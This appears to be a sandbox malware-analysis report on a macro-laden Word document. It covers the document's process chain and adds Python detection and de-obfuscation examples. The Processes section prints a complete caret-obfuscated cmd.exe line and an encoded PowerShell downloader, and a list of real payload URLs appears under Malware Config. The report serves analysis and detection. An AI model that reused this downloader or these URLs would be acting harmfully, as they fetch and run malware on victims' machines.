Analysis
  Max time kernel: 150s
  Max time network: 153s
  Platform: windows10-2004_x64
  Resource: win10v2004-20220414-en
  Submitted: 22-05-2022 05:17
Tasks
  Static task: static1
  Behavioral task: behavioral1 (sample akqzxikp.doc, resource win7-20220414-en)
  Behavioral task: behavioral2 (sample akqzxikp.doc, resource win10v2004-20220414-en)
General
  Target: akqzxikp.doc
  Size: 154KB
  MD5: 40f79fcaa6e497435e1ac54f87fe90ab
  SHA1: 41acbe1239d7c21c6919033da6fd935db6ee1f58
  SHA256: 43af38ecd27585f00463abfee0ca7f492fb36fa862c8d215447d59be27652589
  SHA512: 93e3876bf713ea07d0302cc2f3432c0aa0365e2d3a5d2babe751a198fde4a0c9b4a080804166485e2843a0ec7e071b7748126bdd7d79472ede19c9fad3688d7a
Malware Config
Extracted: payload download URLs carried in the encoded PowerShell command (see Processes). The decoded script walks this list in order, saving each download to the same local path, and stops after the first file of at least 49338 bytes has been handed to rundll32.exe:
  http://mediatorstewart.com/service-msc/3zZLr/
  http://wolffsachs.com/wp-content/UKZw/
  http://ycspreview.com/shubham/h7qna/
  http://wi360.com/wp-content/u/
  http://linkejet.com.br/cgi-bin/UQ/
  http://nuocmambamuoi.vn/wp-admin/Ty/
  http://ellinismos1922.gr/log/c99FG/
Signatures

Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  description: Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process
  pid: 4432; pid_target: 4364; process: cmd.exe
  Note: the recorded parent of cmd.exe is wmiprvse.exe rather than WINWORD.EXE, which is what a macro that creates its child through WMI (Win32_Process.Create) produces. Detections keyed only on an Office process spawning a shell do not see this hop.

Blocklisted process makes network request (9 IoCs)
  process: powershell.exe (pid 2952); flows: 14, 31, 38, 54, 62, 65, 67, 69, 75

Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  process: WINWORD.EXE
  Key opened: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString

Enumerates system info in registry (2 TTPs, 3 IoCs)
  process: WINWORD.EXE
  Key opened: \REGISTRY\MACHINE\Hardware\Description\System\BIOS
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
  Note: both registry signatures are attributed to the WINWORD.EXE host process, not to the downloaded payload, so on their own they are weak evidence of malicious intent.

Suspicious behavior: AddClipboardFormatListener (2 IoCs)
  process: WINWORD.EXE (pid 2272), 2 occurrences

Suspicious behavior: EnumeratesProcesses (2 IoCs)
  process: powershell.exe (pid 2952), 2 occurrences

Suspicious use of AdjustPrivilegeToken (1 IoC)
  process: powershell.exe (pid 2952); Token: SeDebugPrivilege

Suspicious use of SetWindowsHookEx (10 IoCs)
  process: WINWORD.EXE (pid 2272), 10 occurrences

Suspicious use of WriteProcessMemory (6 IoCs)
  PID 4432 (cmd.exe) wrote to memory of 3596 (msg.exe), twice
  PID 4432 (cmd.exe) wrote to memory of 2952 (powershell.exe), twice
  PID 2952 (powershell.exe) wrote to memory of 4088 (rundll32.exe), twice
  Note: a parent writing into a child it has just created is part of normal process start-up. The value of this signature is that it confirms the cmd.exe -> powershell.exe -> rundll32.exe chain, not the writes themselves.
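The observable links in the signatures above (a shell started from wmiprvse.exe, a caret-escaped PowerShell token on the cmd.exe command line, PowerShell run with a hidden window and an encoded command, and rundll32.exe loading a DLL from the user profile by export name) can be written as process-creation rules. The block below is an added example for this page, not the sandbox vendor's code; the ProcEvent records are constructed to mirror this report's process tree, and the explorer.exe and wmiprvse.exe entries, their parent PIDs and the short base64 stand-in are assumptions rather than captured telemetry.

```python
"""Process-creation triage for the chain in this report: a shell started by a
parent that should not start one, a caret-obfuscated cmd.exe line, PowerShell
run hidden with an encoded command, and rundll32.exe loading a DLL from the
user profile by export name.  Added example for this page, not the sandbox's
code; SAMPLE_EVENTS are constructed to mirror the report's process tree."""
import base64
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (what Sysmon Event ID 1 or an EDR gives you)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Interpreters and loaders a document host or WMI provider host should never start.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
          "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Office hosts plus wmiprvse.exe: a macro that creates its child through WMI
# (Win32_Process.Create) gets wmiprvse.exe, not WINWORD.EXE, recorded as the
# parent, which is exactly what this report shows for cmd.exe.
SUSPECT_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "wmiprvse.exe"}

HIDDEN = re.compile(r"-w[a-z]*\s+hidden", re.I)                         # -w / -windowstyle hidden
ENCODED = re.compile(r"\s-e(?:c|n[a-z]*)?\s+[A-Za-z0-9+/=]{20,}", re.I)  # -e / -enc / -ENCOD <b64>
CARET_TOKEN = re.compile(r"\w\^\w")                                       # P^Ow^er^she^L^L
RUNDLL_USER_DLL = re.compile(r"([A-Za-z]:\\Users\\[^\s\",]+\.dll)\s*,\s*(\w+)", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def triage(events):
    """Return (pid, finding) pairs; one event can trip several rules."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        name = basename(ev.image)
        parent = by_pid.get(ev.ppid)
        pname = basename(parent.image) if parent else "<unknown>"
        if pname in SUSPECT_PARENTS and name in SHELLS:
            findings.append((ev.pid, f"{pname} spawned {name}"))
        if name == "cmd.exe" and CARET_TOKEN.search(ev.cmdline):
            findings.append((ev.pid, "caret-obfuscated token in cmd.exe command line"))
        if name in ("powershell.exe", "pwsh.exe") and HIDDEN.search(ev.cmdline) \
                and ENCODED.search(ev.cmdline):
            findings.append((ev.pid, "hidden window + encoded command"))
        if name == "rundll32.exe":
            m = RUNDLL_USER_DLL.search(ev.cmdline)
            if m:
                findings.append((ev.pid, f"rundll32 loads {m.group(1)} export {m.group(2)}"))
    return findings


# Constructed stand-in for the encoded argument (the report's real one is far longer).
ENC = base64.b64encode("$a=1;$b=2".encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    ProcEvent(1000, 900, r"C:\Windows\explorer.exe", "explorer.exe"),                     # assumed
    ProcEvent(2272, 1000, r"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE",
              r'"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n '
              r'"C:\Users\Admin\AppData\Local\Temp\akqzxikp.doc" /o ""'),
    ProcEvent(4364, 800, r"C:\Windows\system32\wbem\wmiprvse.exe", "wmiprvse.exe -secured -Embedding"),  # assumed
    ProcEvent(4432, 4364, r"C:\Windows\system32\cmd.exe",
              "cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open "
              "the file. & P^Ow^er^she^L^L -w hidden -ENCOD " + ENC),
    ProcEvent(3596, 4432, r"C:\Windows\system32\msg.exe",
              "msg Admin /v Word experienced an error trying to open the file."),
    ProcEvent(2952, 4432, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "POwersheLL -w hidden -ENCOD " + ENC),
    ProcEvent(4088, 2952, r"C:\Windows\system32\rundll32.exe",
              r'"C:\Windows\system32\rundll32.exe" C:\Users\Admin\I10p0zs\Btjghqf\M21Y.dll,Control_RunDLL'),
]

if __name__ == "__main__":
    for pid, finding in triage(SAMPLE_EVENTS):
        print(pid, finding)
```

Run against the constructed events, the rules fire on cmd.exe (twice), powershell.exe and rundll32.exe and stay silent on WINWORD.EXE, msg.exe and the two assumed system processes. The parent rule is the one to extend: it only catches the WMI hop because wmiprvse.exe is in SUSPECT_PARENTS, and it says nothing about powershell.exe starting rundll32.exe, which the rundll32 path rule covers instead.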
Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\akqzxikp.doc" /o ""
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx

C:\Windows\system32\cmd.exe (parent: C:\Windows\system32\wbem\wmiprvse.exe, see Signatures)
  cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD …
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  Note: the carets are cmd.exe escape characters and are removed before the line runs, so the second command is POwersheLL. The msg.exe call shows the user a decoy "Word experienced an error" dialog; %username% expands to Admin in the child command line below.

  C:\Windows\system32\msg.exe
    msg Admin /v Word experienced an error trying to open the file.

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    POwersheLL -w hidden -ENCOD JABTAG8AOQBSAHEAIAAgAD0AIAAgAFsAVAB5AFAAZQBdACgAIgB7ADMAfQB7ADEAfQB7ADIAfQB7ADAAfQB7ADQAfQAiAC0ARgAgACcALgBpAE8ALgBkAEkAUgBFAEMAJwAsACcARQAnACwAJwBNACcALAAnAHMAeQBzAHQAJwAsACcAdABvAHIAWQAnACkAOwAgACAAIAAgACQAeQB4AE4AdAA2AG0APQBbAFQAWQBQAEUAXQAoACIAewAyAH0AewA1AH0AewAzAH0AewAxAH0AewAwAH0AewA0AH0AIgAtAEYAIAAnAE0AQQBuAEEARwBlACcALAAnAE8ASQBOAFQAJwAsACcAcwB5AHMAdABlAE0ALgBOAGUAVAAuACcALAAnAEMAZQBwACcALAAnAHIAJwAsACcAUwBlAFIAVgBpACcAKQA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlAG4AJwArACcAdABsAHkAJwApACsAKAAnAEMAJwArACcAbwBuACcAKQArACgAJwB0AGkAJwArACcAbgB1AGUAJwApACkAOwAkAFQANQB1ADEAawAyAHQAPQAkAEwAMwAwAEcAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEMAMwAwAEkAOwAkAEUAXwAzAFkAPQAoACcAWAA4ACcAKwAnADAARwAnACkAOwAgACgAIAAgAFYAQQBSAEkAQQBCAGwAZQAgACgAJwBzAG8AOQByACcAKwAnAFEAJwApACAALQB2AGEAbABVAGUAbwBuACkAOgA6ACIAQwBSAGAAZQBBAHQARQBgAGQAaQBgAFIAYABlAGMAVABvAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AEkAJwArACgAJwAxADAAJwArACcAcAAwACcAKQArACcAegBzAHsAMAB9ACcAKwAnAEIAdABqAGcAaABxAGYAewAnACsAJwAwAH0AJwApAC0ARgAgACAAWwBjAEgAQQByAF0AOQAyACkAKQA7ACQARQA0ADAASgA9ACgAJwBHADkAJwArACcAMgBPACcAKQA7ACAAIAAkAFkAeABOAHQANgBNADoAOgAiAFMAZQBgAEMAdQBgAFIAaQB0AHkAcABSAG8AVABvAGAAYwBgAG8ATAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQAWQA0ADgASwA9ACgAKAAnAEIAMAAnACsAJwA0ACcAKQArACcARgAnACkAOwAkAEIAcAB0ADcAeQA1AHoAIAA9ACAAKAAoACcATQAnACsAJwAyADEAJwApACsAJwBZACcAKQA7ACQATgAxADIAUQA9ACgAKAAnAE0AJwArACcANAAyACcAKQArACcAUgAnACkAOwAkAFEAaQB4AHcAaABmADIAPQAkAEgATwBNAEUAKwAoACgAJwBzACcAKwAnAHoAJwArACcASgAnACsAJwBJADEAJwArACgAJwAwACcAKwAnAHAAMAB6AHMAJwApACsAKAAnAHMAJwArACcAegBKACcAKwAnAEIAdABqAGcAaAAnACsAJwBxACcAKQArACgAJwBmAHMAJwArACcAegBKACcAKQApACAAIAAtAEMAcgBFAHAATABBAEMAZQAgACgAWwBDAEgAYQByAF0AMQAxADUAKwBbAEMASABhAHIAXQAxADIAMgArAFsAQwBIAGEAcgBdADcANAApACwAWwBDAEgAYQByAF0AOQAyACkAKwAkAEIAcAB0ADcAeQA1AHoAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABDADUANgBJAD0AKAAoACcASAAnACsAJwAxADMAJwApACsAJwBWACcAKQA7ACQASABnAGIAMAB5AGIAMAA9ACgAJwBdACcAKwAoACcAZQAnACsAJwAxAHIAJwApACsAKAAnAFsAUwAnACsAJwA6AC8ALwAnACsAJwBtAGUAJwApACsAJwBkAGkAJwArACgAJwBhAHQAbwAnACsAJwByAHMAdABlACcAKwAnAHcAYQAnACkAKwAnAHIAJwArACcAdAAuACcAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AJwArACcAcwBlACcAKQArACgAJwByAHYAaQBjACcAKwAnAGUALQBtACcAKwAnAHMAYwAnACkAKwAoACcALwAnACsAJwAzAHoAWgBMAHIALwAnACsAJwBAACcAKQArACcAXQAnACsAKAAnAGUAMQByAFsAUwAnACsAJwA6ACcAKQArACgAJwAvAC8AdwAnACsAJwBvAGwAJwApACsAKAAnAGYAJwArACcAZgBzAGEAYwBoACcAKQArACgAJwBzAC4AYwAnACsAJwBvAG0AJwArACcALwB3ACcAKQArACcAcAAtACcAKwAnAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwBVAEsAJwArACcAWgAnACkAKwAnAHcALwAnACsAJwBAAF0AJwArACgAJwBlACcAKwAnADEAcgBbACcAKQArACcAUwAnACsAKAAnADoAJwArACcALwAnACsAJwAvAHkAYwBzACcAKQArACcAcAByACcAKwAnAGUAJwArACgAJwB2ACcAKwAnAGkAZQB3AC4AJwApACsAKAAnAGMAJwArACcAbwBtACcAKQArACcALwBzACcAKwAnAGgAJwArACcAdQBiACcAKwAoACcAaABhAG0ALwBoADcAJwArACcAcQBuACcAKQArACgAJwBhAC8AJwArACcAQABdAGUAJwApACsAJwAxACcAKwAoACcAcgAnACsAJwBbAFMAJwArACcAOgAvAC8AdwAnACkAKwAoACcAaQAzACcAKwAnADYAJwArACcAMAAuAGMAbwAnACsAJwBtAC8AdwBwACcAKQArACgAJwAtAGMAJwArACcAbwBuAHQAZQBuACcAKQArACgAJwB0ACcAKwAnAC8AdQAvAEAAJwApACsAKAAnAF0AJwArACcAZQAxAHIAWwAnACsAJwBTACcAKQArACgAJwA6AC8ALwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAG4AawBlACcAKwAnAGoAJwApACsAJwBlAHQAJwArACcALgBjACcAKwAnAG8AJwArACgAJwBtACcAKwAnAC4AYgByAC8AYwBnAGkALQAnACsAJwBiACcAKQArACcAaQBuACcAKwAoACcALwBVAFEALwBAAF0AJwArACcAZQAxACcAKwAnAHIAJwArACcAWwBTADoAJwArACcALwAnACkAKwAoACcALwBuAHUAbwAnACsAJwBjACcAKQArACgAJwBtAGEAJwArACcAbQBiAGEAJwApACsAJwBtAHUAJwArACcAbwBpACcAKwAnAC4AdgAnACsAKAAnAG4AJwArACcALwB3ACcAKQArACgAJwBwACcAKwAnAC0AYQBkACcAKQArACgAJwBtACcAKwAnAGkAbgAnACkAKwAoACcALwBUAHkAJwArACcALwAnACkAKwAoACcAQABdAGUAJwArACcAMQAnACkAKwAoACcAcgBbACcAKwAnAFMAJwApACsAKAAnADoALwAvAGUAJwArACcAbABsACcAKQArACgAJwBpAG4AJwArACcAaQBzACcAKQArACcAbQBvACcAKwAoACcAcwAnACsAJwAxADkAJwApACsAJwAyACcAKwAoACcAMgAuACcAKwAnAGcAcgAvACcAKwAnAGwAbwBnAC8AJwArACcAYwA5ACcAKQArACcAOQBGACcAKwAnAEcALwAnACkALgAiAHIARQBwAGAAbABBAEMARQAiACgAKAAoACcAXQBlADEAJwArACcAcgBbACcAKQArACcAUwAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAFMAYABwAEwAaQBUACIAKAAkAFcANAA5AFIAIAArACAAJABUADUAdQAxAGsAMgB0ACAAKwAgACQAQgA1ADgAQQApADsAJABCADMAMABXAD0AKAAoACcARgAnACsAJwA4ADYAJwApACsAJwBGACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUQBiAGYAOAA0ADMAeQAgAGkAbgAgACQASABnAGIAMAB5AGIAMAApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0ATwAnACsAJwBiAGoAJwArACcAZQBjAHQAJwApACAAcwB5AHMAdABlAE0ALgBuAGUAdAAuAFcAZQBiAEMATABJAGUAbgBUACkALgAiAGQAYABPAGAAVwBOAGwAbwBBAGQAZgBJAEwAZQAiACgAJABRAGIAZgA4ADQAMwB5ACwAIAAkAFEAaQB4AHcAaABmADIAKQA7ACQAUQAyADEATAA9ACgAJwBSADQAJwArACcAXwBZACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABRAGkAeAB3AGgAZgAyACkALgAiAEwAZQBuAEcAYABUAEgAIgAgAC0AZwBlACAANAA5ADMAMwA4ACkAIAB7ACYAKAAnAHIAJwArACcAdQBuAGQAJwArACcAbABsADMAMgAnACkAIAAkAFEAaQB4AHcAaABmADIALAAoACgAJwBDAG8AJwArACcAbgB0AHIAbwAnACsAJwBsACcAKwAnAF8AUgAnACkAKwAnAHUAbgAnACsAKAAnAEQAJwArACcATABMACcAKQApAC4AIgB0AE8AcwBUAGAAUgBpAE4ARwAiACgAKQA7ACQAVwAzADAAUQA9ACgAKAAnAEcAJwArACcANQA5ACcAKQArACcASAAnACkAOwBiAHIAZQBhAGsAOwAkAFEAMgA4AFcAPQAoACcATAA4ACcAKwAnAF8AQgAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAE8AMQA5AEsAPQAoACcASAAnACsAKAAnADQAJwArACcANgBFACcAKQApAA==
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    Note: the argument is base64 over UTF-16LE. Decoded, the script sets $ErrorActionPreference to SilentlyContinue and ServicePointManager::SecurityProtocol to Tls12, creates $HOME\I10p0zs\Btjghqf\, then walks the URL list from Malware Config (stored with ]e1r[S in place of http and @ as the separator), downloading each candidate to M21Y.dll with System.Net.WebClient.DownloadFile. The first file of at least 49338 bytes is started with rundll32 <path>,Control_RunDLL and the loop breaks.

    C:\Windows\system32\rundll32.exe
      "C:\Windows\system32\rundll32.exe" C:\Users\Admin\I10p0zs\Btjghqf\M21Y.dll,Control_RunDLL
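Recovering the download list from a launcher like the one above takes four steps: drop the cmd.exe carets, base64-decode the -ENCOD argument as UTF-16LE, fold the concatenated string fragments and backtick-split member names, then undo the scheme substitution and the separator split. The block below is an added example for this page, not the sandbox's or the malware's code. SAMPLE_SCRIPT is a constructed script that reuses the same tricks against .example hosts; the separator is a parameter because the real script assembles it from variables rather than a literal, and the -F format-operator reordering the real script uses for its type names is deliberately not handled.

```python
"""Decode and de-obfuscate a cmd.exe -> PowerShell -EncodedCommand launcher of
the shape seen in this report's process tree.  Added example written for this
page; the launcher below is constructed (caret escaping, base64 over UTF-16LE,
fragment concatenation, backtick-split member names, a ']e1r[S' scheme marker
and an '@' separator) and is not the report's payload."""
import base64
import re

# -EncodedCommand may be abbreviated to any unambiguous prefix (-e, -enc,
# -ENCOD ...); -ExecutionPolicy starts with -ex and is excluded.
ENC_ARG = re.compile(r"\s-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.I)
# First argument of the .replace() that restores the scheme; the second is a
# literal in the constructed sample but an indexed array in the real script,
# so it falls back to 'http'.
REPLACE_CALL = re.compile(r"\.replace\(\s*'([^']+)'\s*,\s*(?:'([^']+)')?", re.I)


def strip_cmd_carets(cmdline: str) -> str:
    """cmd.exe removes ^ before the command runs, so P^Ow^er^she^L^L is
    POwersheLL to cmd.exe but defeats a naive substring match."""
    return cmdline.replace("^", "")


def encode_command(script: str) -> str:
    """Inverse of decode_encoded_command; used here to build the sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str) -> str:
    """The argument is base64 over UTF-16LE, not UTF-8: decoding it as UTF-8
    yields NUL-interleaved text that string matches will not hit."""
    return base64.b64decode(b64).decode("utf-16-le")


def unbacktick_member_names(script: str) -> str:
    """."d`OwnL`oadFile"( and ::"Securit`yProto`col" are plain member
    accesses once the backticks inside the quoted name are removed."""
    return re.sub(r'(?<=[.:])"([A-Za-z_`]+)"',
                  lambda m: m.group(1).replace("`", ""), script)


def fold_string_fragments(script: str) -> str:
    """Collapse 'a'+'b' and ('a') until nothing changes.  Parentheses that
    follow a word character are a call, not a grouping, and are left alone."""
    concat = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
    parens = re.compile(r"""(?<![\w\]"'])\(\s*'([^']*)'\s*\)""")
    prev = None
    while prev != script:
        prev = script
        script = concat.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", script)
        script = parens.sub(lambda m: "'" + m.group(1) + "'", script)
    return script


def recover_urls(deobfuscated: str, separator: str = "@") -> list:
    """Find the literal holding the scheme-mangled URL list and restore it."""
    m = REPLACE_CALL.search(deobfuscated)
    if not m:
        return []
    marker, scheme = m.group(1), m.group(2) or "http"
    urls = []
    for lit in re.findall(r"'([^']*)'", deobfuscated):
        if marker + "://" in lit:
            urls.extend(u for u in lit.replace(marker, scheme).split(separator)
                        if u.startswith(("http://", "https://")))
    return urls


def analyze_launcher(cmdline: str, separator: str = "@") -> dict:
    launcher = strip_cmd_carets(cmdline)
    m = ENC_ARG.search(launcher)
    if not m:
        raise ValueError("no -EncodedCommand argument in command line")
    decoded = decode_encoded_command(m.group(1))
    deob = fold_string_fragments(unbacktick_member_names(decoded))
    return {"launcher": launcher, "decoded": decoded,
            "deobfuscated": deob, "urls": recover_urls(deob, separator)}


# Constructed sample (not the page's payload): same structure, .example hosts.
SAMPLE_SCRIPT = (
    "$ErrorActionPreference = ('Si'+('len'+'tly')+('C'+'on')+('ti'+'nue'));"
    '[System.Net.ServicePointManager]::"Securit`yProto`col" = (\'T\'+\'ls1\')+\'2\';'
    "$u = ((']e1'+'r[S://'+'c2-'+'one.exam'+'ple/a/@')+(']e1r'+'[S://c2'+'-two.example/b/'))"
    '."rEp`lACE"((\']e1r[\'+\'S\'),(\'ht\'+\'tp\'))."S`pLiT"(\'@\');'
    "foreach ($x in $u) { try { (&('New-O'+'bj'+'ect') System.Net.WebClient)"
    '."d`OwnL`oadFile"($x, $p); break } catch {} }'
)
SAMPLE_CMDLINE = ("cmd cmd cmd cmd /c msg %username% /v Word experienced an error "
                  "trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD "
                  + encode_command(SAMPLE_SCRIPT))

if __name__ == "__main__":
    result = analyze_launcher(SAMPLE_CMDLINE)
    print(result["deobfuscated"])
    print(result["urls"])
```

On the constructed launcher the folded script reads as ordinary PowerShell (SilentlyContinue, Tls12, .rEplACE(']e1r[S','http'), .dOwnLoadFile) and the two .example URLs come back in order. Against the real argument above the same steps apply, with two caveats: pass the separator explicitly, since the script builds '@' from [char](64) and two undefined variables, and expect the [Type]("{3}{1}{2}{0}{4}" -F ...) constructions to stay unfolded.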
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\Users\Admin\I10p0zs\Btjghqf\M21Y.dll (67KB)
  The file written by the PowerShell stage and loaded by rundll32.exe (see Processes); at 67KB it clears the script's 49338-byte minimum.
  MD5: 2a88b493cb6fe862b887d6316fad5a3d
  SHA1: f15dd8ce02fba26d776cfe70f4884b84d92f3448
  SHA256: 0e56b79f74d3cb96da47d2d2dc0234b52eb9c83707d1005c2ff05740626feded
  SHA512: 62d7f0dbc915f13b100841823aad6384f66c2b06630f9bc36900a746bde7631a4ba93ff1efeecb0117394efb15d762bed9f69a2eb6250ff20f9ea4bb341a37d1

Memory dumps
  memory/2272-130-0x00007FF81D730000-0x00007FF81D740000-memory.dmp (64KB)
  memory/2272-131-0x00007FF81D730000-0x00007FF81D740000-memory.dmp (64KB)
  memory/2272-132-0x00007FF81D730000-0x00007FF81D740000-memory.dmp (64KB)
  memory/2272-133-0x00007FF81D730000-0x00007FF81D740000-memory.dmp (64KB)
  memory/2272-134-0x00007FF81D730000-0x00007FF81D740000-memory.dmp (64KB)
  memory/2272-135-0x00007FF81B520000-0x00007FF81B530000-memory.dmp (64KB)
  memory/2272-136-0x00007FF81B520000-0x00007FF81B530000-memory.dmp (64KB)
  memory/2272-144-0x00007FF81D730000-0x00007FF81D740000-memory.dmp (64KB)
  memory/2272-145-0x00007FF81D730000-0x00007FF81D740000-memory.dmp (64KB)
  memory/2272-146-0x00007FF81D730000-0x00007FF81D740000-memory.dmp (64KB)
  memory/2272-147-0x00007FF81D730000-0x00007FF81D740000-memory.dmp (64KB)
  memory/2952-138-0x0000000000000000-mapping.dmp
  memory/2952-139-0x0000022130930000-0x0000022130952000-memory.dmp (136KB)
  memory/2952-140-0x00007FF8321F0000-0x00007FF832CB1000-memory.dmp (10.8MB)
  memory/3596-137-0x0000000000000000-mapping.dmp
  memory/4088-141-0x0000000000000000-mapping.dmp